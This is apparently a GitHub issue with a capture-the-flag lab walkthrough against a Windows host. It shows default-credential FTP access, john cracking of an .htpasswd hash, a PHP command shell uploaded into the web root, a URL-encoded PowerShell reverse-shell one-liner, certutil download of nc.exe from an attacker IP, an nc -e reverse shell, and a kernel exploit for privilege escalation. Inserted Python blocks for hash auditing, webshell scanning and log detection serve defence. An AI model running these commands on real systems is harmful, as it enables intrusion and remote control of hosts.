WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 zFTPServer 6.0 build 2011-10-17
242/tcp open http syn-ack ttl 125 Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
3145/tcp open zftp-admin syn-ack ttl 125 zFTPServer admin
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 125
| rdp-ntlm-info:
| Target_Name: LIVDA
| NetBIOS_Domain_Name: LIVDA
| NetBIOS_Computer_Name: LIVDA
| DNS_Domain_Name: LIVDA
| DNS_Computer_Name: LIVDA
| Product_Version: 6.0.6001
|_ System_Time: 2024-07-31T04:13:35+00:00
|_ssl-date: 2024-07-31T04:13:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Issuer: commonName=LIVDA
Search exploit info for zFTP --> zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal
22/tcp: Log in to FTP as anonymous --> cannot download files due to permissions. Usernames are listed in the /accounts dir.
242/tcp: --> Try admin:admin --> failed... --> Try logging in with the account name info --> failed
Try logging in to FTP with the account name info (Offsec, Admin)
--> can log in with admin:admin
Download all files and confirm the content.
cat .htpasswd
-->
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
Crack it:
echo '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
--> elite
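The `.htpasswd` line above is an Apache `$apr1$` (MD5-based) hash, which is why a wordlist run finishes in seconds. From the defender's side the same property lets you audit the file yourself. The following Python is an added example, not part of the issue or of any project it mentions: it implements the `$apr1$` algorithm with the standard library, classifies each entry's hash scheme (apr1 and unsalted SHA-1 are flagged as weak, bcrypt is not), and checks apr1 entries against a small deny-list. The `HTPASSWD` text reuses the hash from the issue plus a constructed bcrypt-format placeholder; `DENYLIST` is a constructed stand-in for a real banned-password corpus.

```python
import hashlib
import hmac

# Alphabet used by md5crypt / Apache $apr1$ for its custom base64 encoding.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed .htpasswd content: the first line is the hash from the issue,
# the second is a bcrypt-format placeholder (not a real hash of anything).
HTPASSWD = (
    "offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0\n"
    "auditor:$2y$10$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1\n"
)

# Constructed deny-list standing in for a real banned-password corpus.
DENYLIST = ["password", "admin", "123456", "elite", "letmein"]


def _to64(value, count):
    """Emit `count` characters of md5crypt's little-endian base64."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_hash(password, salt):
    """Apache $apr1$ hash (the md5crypt algorithm with the '$apr1$' magic)."""
    pw = password.encode()
    salt = salt[:8].encode()
    ctx = hashlib.md5(pw + b"$apr1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    remaining = len(pw)
    while remaining > 0:                       # mix in `alt`, repeated to len(pw)
        ctx.update(alt[: min(remaining, 16)])
        remaining -= 16
    bit = len(pw)
    while bit:                                 # one byte per bit of len(pw)
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):                      # fixed 1000-round stretching
        ctx = hashlib.md5()
        ctx.update(pw if i & 1 else final)
        if i % 3:
            ctx.update(salt)
        if i % 7:
            ctx.update(pw)
        ctx.update(final if i & 1 else pw)
        final = ctx.digest()
    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups
    ) + _to64(final[11], 2)
    return "$apr1$" + salt.decode() + "$" + encoded


def verify_apr1(password, stored):
    """Constant-time check of a candidate password against a $apr1$ hash."""
    try:
        _, scheme, salt, _digest = stored.split("$", 3)
    except ValueError:
        return False
    if scheme != "apr1":
        return False
    return hmac.compare_digest(apr1_hash(password, salt), stored)


def classify(hash_field):
    """Return (scheme name, is_weak) for one htpasswd hash field."""
    if hash_field.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt", False
    if hash_field.startswith("$apr1$"):
        return "apr1-md5", True
    if hash_field.startswith("{SHA}"):
        return "sha1-unsalted", True
    return "crypt-or-plain", True


def audit_htpasswd(text):
    """Flag weak hash schemes and apr1 entries whose password is on the deny-list."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#") or ":" not in line:
            continue
        user, hash_field = line.split(":", 1)
        scheme, weak = classify(hash_field)
        hit = None
        if scheme == "apr1-md5":
            hit = next((p for p in DENYLIST if verify_apr1(p, hash_field)), None)
        findings.append({"user": user, "scheme": scheme, "weak": weak, "denylist_hit": hit})
    return findings


if __name__ == "__main__":
    for f in audit_htpasswd(HTPASSWD):
        print(f)
```

Run it against a real `.htpasswd` by passing the file contents to `audit_htpasswd`; any `apr1-md5` or `sha1-unsalted` entry is worth migrating to bcrypt (`htpasswd -B`) regardless of whether the deny-list matches, since the scheme itself is what makes the offline wordlist run cheap.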
Log in to the 242/tcp page with offsec:elite --> Translate to English: "He who wants to be a nut from a nut breaks the nut!"
ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.156.46/FUZZ -H "Authorization: Basic b2Zmc2VjOmVsaXRl"
--> No info
Try RDP login with offsec:elite --> failed
When logging in to FTP with admin:admin, found that we can upload files to the FTP server!
So, upload a PHP cmd file,
because the FTP directory contains the "index.php" that we found after logging in to 242/tcp.
So the reverse-shell PHP file can be accessed via IP:242/php_cmd.php?cmd=whoami
--> works!
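The root cause here is an FTP account that can write into the web root, so anything dropped there is served by Apache. A defender who inherits such a host wants a quick sweep for PHP files that hand request data to a command-execution sink. The scanner below is an added example written for this issue, not code from the issue or from any project it names: it walks a directory, and for each PHP-like file reports statements where `system`/`exec`/`eval`/etc. receive a `$_GET`/`$_POST`/`$_REQUEST`/`$_COOKIE` value or a `base64_decode(...)` result. `SAMPLE_FILES` is a constructed web root; the `php_cmd.php` entry mirrors the file name the issue mentions and uses the minimal one-line cmd-shell shape, while `lib/helper.inc` shows that a sink with a constant argument is not reported.

```python
import re
import tempfile
from pathlib import Path

# Command-execution sinks whose argument list (up to the next ';') pulls from
# request data or from base64_decode(): the shape of a minimal PHP cmd shell.
SHELL_SINK = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
    r"[^;]*?(\$_(?:GET|POST|REQUEST|COOKIE)\b|base64_decode\s*\()"
)
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}

# Constructed webroot contents for the demo (relative path -> file body).
SAMPLE_FILES = {
    "index.php": "<?php\n// constructed benign landing page\necho 'hello';\n",
    "php_cmd.php": "<?php\nsystem($_GET['cmd']);\n",                       # cmd-shell pattern named in the issue
    "uploads/img.php": "<?php\n@eval(base64_decode($_POST['x']));\n",      # obfuscated variant
    "lib/helper.inc": "<?php\nfunction now() { return exec('date'); }\n",  # sink with a constant argument
}


def build_sample_webroot():
    """Write SAMPLE_FILES into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, body in SAMPLE_FILES.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


def scan_webroot(root):
    """Return one finding per sink-to-request-data statement found under root."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        text = path.read_text(errors="replace")
        for m in SHELL_SINK.finditer(text):
            findings.append({
                "file": path.relative_to(root).as_posix(),
                "line": text.count("\n", 0, m.start()) + 1,   # 1-based line of the sink
                "sink": m.group(1),
                "source": m.group(2),
            })
    return findings


if __name__ == "__main__":
    for f in scan_webroot(build_sample_webroot()):
        print(f)
```

Point `scan_webroot` at the real document root to triage; it is a pattern match, not a PHP parser, so treat hits as leads to read by hand, and pair it with the structural fix (the FTP service must not be able to write into a directory Apache executes from).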
Use a PowerShell reverse command:
....?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.205%27%2C80%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
--> didn't work.
Try uploading nc.exe and then getting a reverse shell via nc.exe:
wget 192.168.45.205/nc64.exe -O C:/windows/temp/nc64.exe
--> didn't work
certutil -urlcache -f http://192.168.45.205/nc.exe c:/users/public/downloads/nc.exe
certutil%20-urlcache%20-f%20http://192.168.45.205/nc.exe%20%20c:/users/public/downloads/nc.exe
c:/users/public/downloads/nc.exe -e cmd 192.168.45.205 4444
--> works! (Also tried other dir locations, but all failed:
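Every command run through the uploaded file in this section (`whoami`, the URL-encoded PowerShell one-liner, `certutil -urlcache`, `nc.exe -e`) leaves a request line in the Apache access log, and the encoded PowerShell decodes to plain text once the query string is parsed. The detection logic below is an added example, not part of the issue: it parses combined-format access log lines, percent-decodes the query, and flags requests to PHP files whose `cmd`-style parameter carries recon, download-cradle, PowerShell TCP-client or `nc -e` indicators. `SAMPLE_LOG` is constructed, uses documentation-range IPs rather than the issue's, and includes a `search.php?q=whoami...` line to show that the same word in an unrelated parameter is not flagged.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/httpd combined-style access log line (constructed sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Query parameters a one-line PHP cmd shell typically reads.
CMD_PARAMS = {"cmd", "c", "exec", "command", "x"}

# Indicators applied to the *decoded* parameter value.
INDICATORS = [
    ("recon", re.compile(r"\b(whoami|systeminfo|ipconfig|net user)\b", re.I)),
    ("download-cradle", re.compile(r"(\bcertutil(\.exe)?\b.*-urlcache)|\b(wget|curl|bitsadmin)\b", re.I)),
    ("powershell-tcp-client", re.compile(r"System\.Net\.Sockets\.TCPClient|powershell(\.exe)?\s+-nop", re.I)),
    ("nc-exec", re.compile(r"\bnc(64)?(\.exe)?\b.*\s-e\s", re.I)),
]

# Constructed sample log; IPs are from the documentation range, not the issue's.
SAMPLE_LOG = """\
192.0.2.10 - offsec [31/Jul/2024:04:20:01 +0000] "GET /index.php HTTP/1.1" 200 512
192.0.2.10 - offsec [31/Jul/2024:04:21:15 +0000] "GET /php_cmd.php?cmd=whoami HTTP/1.1" 200 34
192.0.2.10 - offsec [31/Jul/2024:04:22:10 +0000] "GET /php_cmd.php?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.0.2.10%27%2C80%29%22 HTTP/1.1" 200 0
192.0.2.10 - offsec [31/Jul/2024:04:22:40 +0000] "GET /php_cmd.php?cmd=certutil%20-urlcache%20-f%20http://192.0.2.10/nc.exe%20c:/users/public/downloads/nc.exe HTTP/1.1" 200 120
192.0.2.10 - offsec [31/Jul/2024:04:23:02 +0000] "GET /php_cmd.php?cmd=c:/users/public/downloads/nc.exe%20-e%20cmd%20192.0.2.10%204444 HTTP/1.1" 200 0
198.51.100.7 - - [31/Jul/2024:04:25:00 +0000] "GET /search.php?q=whoami+is+a+unix+command HTTP/1.1" 200 2048
"""


def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.lower().endswith((".php", ".phtml")):
        return None
    # parse_qsl percent-decodes values, so encoded payloads are matched in clear text
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() not in CMD_PARAMS:
            continue
        hits = [tag for tag, rx in INDICATORS if rx.search(value)]
        if hits:
            return {"ip": m["ip"], "user": m["user"], "ts": m["ts"], "path": parts.path,
                    "param": name, "value": value, "indicators": hits}
    return None


def scan_log(text):
    """Run inspect_line over every line of an access log and collect findings."""
    return [f for f in map(inspect_line, text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], f["indicators"], f["value"][:60])
```

Feed `scan_log` the contents of `access.log`; a sequence of hits from one client against one freshly created PHP file, as in the sample, is the pattern to alert on, and the decoded `value` field gives the analyst the command without hand-decoding the URL.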
systeminfo --->
Regarding Windows kernel exploits, can use https://github.com/SecWiki/windows-kernel-exploits --> https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120
Put x86.exe on FTP and use it to send an nc reverse shell, so we got a reverse shell as the admin user.
Keypoints: